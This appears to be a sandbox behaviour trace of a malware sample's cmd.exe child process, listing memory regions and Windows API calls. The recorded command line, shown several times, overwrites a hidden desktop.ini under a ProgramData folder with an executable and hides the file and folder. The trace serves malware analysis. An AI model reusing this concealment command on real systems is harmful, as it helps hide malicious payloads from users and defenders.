"0x7ea166a0" os_pid = "0xacc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~2\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 28543 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 28544 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 28545 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 28546 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 28547 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 28548 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = 
"\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 28549 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 28550 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 28551 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 28552 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 28601 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 28602 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 28603 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 28604 start_va = 0x3e0000 end_va = 0x4dffff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 28605 start_va = 0x6d0000 end_va = 0x6dffff entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 28606 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 28607 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = 
"\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 28608 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 28609 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 28610 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 28611 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 28612 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 28613 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 28614 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 28615 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 28616 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 
28617 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 28618 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 28619 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 28620 start_va = 0x2b0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 28621 start_va = 0x3c0000 end_va = 0x3c0fff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 28622 start_va = 0x3d0000 end_va = 0x3d0fff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 28623 start_va = 0x4e0000 end_va = 0x642fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 28624 start_va = 0x6e0000 end_va = 0x12dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006e0000" filename = "" Region: id = 28649 start_va = 0x12e0000 end_va = 0x15aefff entry_point = 0x12e0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 636 os_tid = 0xb0c [0194.369] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2afcfc | out: lpSystemTimeAsFileTime=0x2afcfc*(dwLowDateTime=0xa8b95560, dwHighDateTime=0x1d440a9)) [0194.369] GetCurrentProcessId () returned 0xacc [0194.369] GetCurrentThreadId () returned 0xb0c [0194.369] GetTickCount () returned 0x372fd [0194.369] QueryPerformanceCounter (in: lpPerformanceCount=0x2afcf4 | out: 
lpPerformanceCount=0x2afcf4*=25115789233) returned 1 [0194.369] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0194.369] __set_app_type (_Type=0x1) [0194.369] __p__fmode () returned 0x76b331f4 [0194.369] __p__commode () returned 0x76b331fc [0194.369] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0194.370] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0194.370] GetCurrentThreadId () returned 0xb0c [0194.370] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb0c) returned 0x38 [0194.370] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0194.370] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0194.370] SetThreadUILanguage (LangId=0x0) returned 0x409 [0194.375] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0194.375] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2afc8c | out: phkResult=0x2afc8c*=0x0) returned 0x2 [0194.375] VirtualQuery (in: lpAddress=0x2afcc3, lpBuffer=0x2afc5c, dwLength=0x1c | out: lpBuffer=0x2afc5c*(BaseAddress=0x2af000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0194.375] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x2afc5c, dwLength=0x1c | out: lpBuffer=0x2afc5c*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0194.375] VirtualQuery (in: lpAddress=0x1b1000, lpBuffer=0x2afc5c, dwLength=0x1c | out: lpBuffer=0x2afc5c*(BaseAddress=0x1b1000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, 
Type=0x20000)) returned 0x1c [0194.375] VirtualQuery (in: lpAddress=0x1b3000, lpBuffer=0x2afc5c, dwLength=0x1c | out: lpBuffer=0x2afc5c*(BaseAddress=0x1b3000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0194.375] VirtualQuery (in: lpAddress=0x2b0000, lpBuffer=0x2afc5c, dwLength=0x1c | out: lpBuffer=0x2afc5c*(BaseAddress=0x2b0000, AllocationBase=0x2b0000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0194.375] GetConsoleOutputCP () returned 0x1b5 [0194.375] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0194.375] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0194.375] _get_osfhandle (_FileHandle=1) returned 0x7 [0194.375] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0194.375] _get_osfhandle (_FileHandle=1) returned 0x7 [0194.375] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0194.376] _get_osfhandle (_FileHandle=1) returned 0x7 [0194.376] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0194.376] _get_osfhandle (_FileHandle=0) returned 0x3 [0194.376] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0194.376] _get_osfhandle (_FileHandle=0) returned 0x3 [0194.376] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0194.377] GetEnvironmentStringsW () returned 0x3f0428* [0194.378] FreeEnvironmentStringsW (penv=0x3f0428) returned 1 [0194.378] GetEnvironmentStringsW () returned 0x3f0428* [0194.378] FreeEnvironmentStringsW (penv=0x3f0428) returned 1 [0194.378] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2aebfc | out: phkResult=0x2aebfc*=0x40) returned 0x0 [0194.378] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, 
lpType=0x2aec04, lpData=0x2aec08, lpcbData=0x2aec00*=0x1000 | out: lpType=0x2aec04*=0x0, lpData=0x2aec08*=0xd8, lpcbData=0x2aec00*=0x1000) returned 0x2 [0194.378] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2aec04, lpData=0x2aec08, lpcbData=0x2aec00*=0x1000 | out: lpType=0x2aec04*=0x4, lpData=0x2aec08*=0x1, lpcbData=0x2aec00*=0x4) returned 0x0 [0194.378] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2aec04, lpData=0x2aec08, lpcbData=0x2aec00*=0x1000 | out: lpType=0x2aec04*=0x0, lpData=0x2aec08*=0x1, lpcbData=0x2aec00*=0x1000) returned 0x2 [0194.378] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2aec04, lpData=0x2aec08, lpcbData=0x2aec00*=0x1000 | out: lpType=0x2aec04*=0x4, lpData=0x2aec08*=0x0, lpcbData=0x2aec00*=0x4) returned 0x0 [0194.378] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2aec04, lpData=0x2aec08, lpcbData=0x2aec00*=0x1000 | out: lpType=0x2aec04*=0x4, lpData=0x2aec08*=0x40, lpcbData=0x2aec00*=0x4) returned 0x0 [0194.378] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2aec04, lpData=0x2aec08, lpcbData=0x2aec00*=0x1000 | out: lpType=0x2aec04*=0x4, lpData=0x2aec08*=0x40, lpcbData=0x2aec00*=0x4) returned 0x0 [0194.378] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2aec04, lpData=0x2aec08, lpcbData=0x2aec00*=0x1000 | out: lpType=0x2aec04*=0x0, lpData=0x2aec08*=0x40, lpcbData=0x2aec00*=0x1000) returned 0x2 [0194.378] RegCloseKey (hKey=0x40) returned 0x0 [0194.378] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2aebfc | out: phkResult=0x2aebfc*=0x40) returned 0x0 [0194.378] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2aec04, lpData=0x2aec08, lpcbData=0x2aec00*=0x1000 | out: 
lpType=0x2aec04*=0x0, lpData=0x2aec08*=0x40, lpcbData=0x2aec00*=0x1000) returned 0x2 [0194.378] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2aec04, lpData=0x2aec08, lpcbData=0x2aec00*=0x1000 | out: lpType=0x2aec04*=0x4, lpData=0x2aec08*=0x1, lpcbData=0x2aec00*=0x4) returned 0x0 [0194.378] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2aec04, lpData=0x2aec08, lpcbData=0x2aec00*=0x1000 | out: lpType=0x2aec04*=0x0, lpData=0x2aec08*=0x1, lpcbData=0x2aec00*=0x1000) returned 0x2 [0194.378] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2aec04, lpData=0x2aec08, lpcbData=0x2aec00*=0x1000 | out: lpType=0x2aec04*=0x4, lpData=0x2aec08*=0x0, lpcbData=0x2aec00*=0x4) returned 0x0 [0194.378] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2aec04, lpData=0x2aec08, lpcbData=0x2aec00*=0x1000 | out: lpType=0x2aec04*=0x4, lpData=0x2aec08*=0x9, lpcbData=0x2aec00*=0x4) returned 0x0 [0194.378] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2aec04, lpData=0x2aec08, lpcbData=0x2aec00*=0x1000 | out: lpType=0x2aec04*=0x4, lpData=0x2aec08*=0x9, lpcbData=0x2aec00*=0x4) returned 0x0 [0194.378] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2aec04, lpData=0x2aec08, lpcbData=0x2aec00*=0x1000 | out: lpType=0x2aec04*=0x0, lpData=0x2aec08*=0x9, lpcbData=0x2aec00*=0x1000) returned 0x2 [0194.379] RegCloseKey (hKey=0x40) returned 0x0 [0194.379] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88639c [0194.379] srand (_Seed=0x5b88639c) [0194.379] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini\" && 
attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~2\"" [0194.379] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~2\"" [0194.379] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0194.379] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3f1b88, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0194.379] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0194.379] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0194.379] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0194.379] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0194.379] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0194.379] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0194.379] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0194.379] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0194.379] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0194.379] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0194.379] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 
[0194.379] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0194.380] GetEnvironmentStringsW () returned 0x3f2578* [0194.380] FreeEnvironmentStringsW (penv=0x3f2578) returned 1 [0194.380] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0194.380] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0194.380] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0194.380] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0194.380] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0194.380] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0194.380] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0194.380] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0194.380] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0194.380] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0194.380] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2af9c8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0194.380] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2af9c8, lpFilePart=0x2af9c4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2af9c4*="Desktop") returned 0x18 [0194.380] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0194.380] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2af744 | out: lpFindFileData=0x2af744) returned 0x3f0c08 [0194.380] FindClose (in: hFindFile=0x3f0c08 | out: hFindFile=0x3f0c08) returned 1 [0194.380] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2af744 | out: lpFindFileData=0x2af744) returned 0x3f0c08 [0194.381] FindClose (in: hFindFile=0x3f0c08 | out: hFindFile=0x3f0c08) returned 1 [0194.381] FindFirstFileW 
(in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2af744 | out: lpFindFileData=0x2af744) returned 0x3f0c08 [0194.381] FindClose (in: hFindFile=0x3f0c08 | out: hFindFile=0x3f0c08) returned 1 [0194.381] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0194.381] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0194.381] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0194.381] GetEnvironmentStringsW () returned 0x3f0428* [0194.381] FreeEnvironmentStringsW (penv=0x3f0428) returned 1 [0194.381] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0194.381] GetConsoleOutputCP () returned 0x1b5 [0194.390] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0194.390] GetUserDefaultLCID () returned 0x409 [0194.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0194.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2afb08, cchData=128 | out: lpLCData="0") returned 2 [0194.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2afb08, cchData=128 | out: lpLCData="0") returned 2 [0194.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2afb08, cchData=128 | out: lpLCData="1") returned 2 [0194.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0194.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0194.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0194.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 
[0194.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0194.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0194.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0194.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0194.392] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0194.392] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0194.392] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0194.393] GetConsoleTitleW (in: lpConsoleTitle=0x3e0a78, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0194.393] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0194.393] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0194.393] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0194.393] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0194.394] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0194.394] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0194.394] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0194.394] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0194.395] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0194.395] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0194.395] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0194.397] _wcsicmp (_String1="del", _String2=")") returned 59 [0194.397] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0194.397] _wcsicmp (_String1="FOR/?", _String2="del") 
returned 2 [0194.397] _wcsicmp (_String1="IF", _String2="del") returned 5 [0194.397] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0194.397] _wcsicmp (_String1="REM", _String2="del") returned 14 [0194.397] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0194.399] _wcsicmp (_String1="type", _String2=")") returned 75 [0194.399] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0194.399] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0194.399] _wcsicmp (_String1="IF", _String2="type") returned -11 [0194.399] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0194.399] _wcsicmp (_String1="REM", _String2="type") returned -2 [0194.399] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0194.403] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0194.403] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0194.403] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0194.403] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0194.403] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0194.403] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0194.525] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0194.525] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0194.539] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0194.540] FindClose (in: hFindFile=0x3f2528 | out: hFindFile=0x3f2528) returned 1 [0194.540] FindClose (in: hFindFile=0x3f2528 | out: hFindFile=0x3f2528) returned 1 [0194.540] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0194.540] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0194.540] GetConsoleTitleW (in: lpConsoleTitle=0x2af530, nSize=0x104 | 
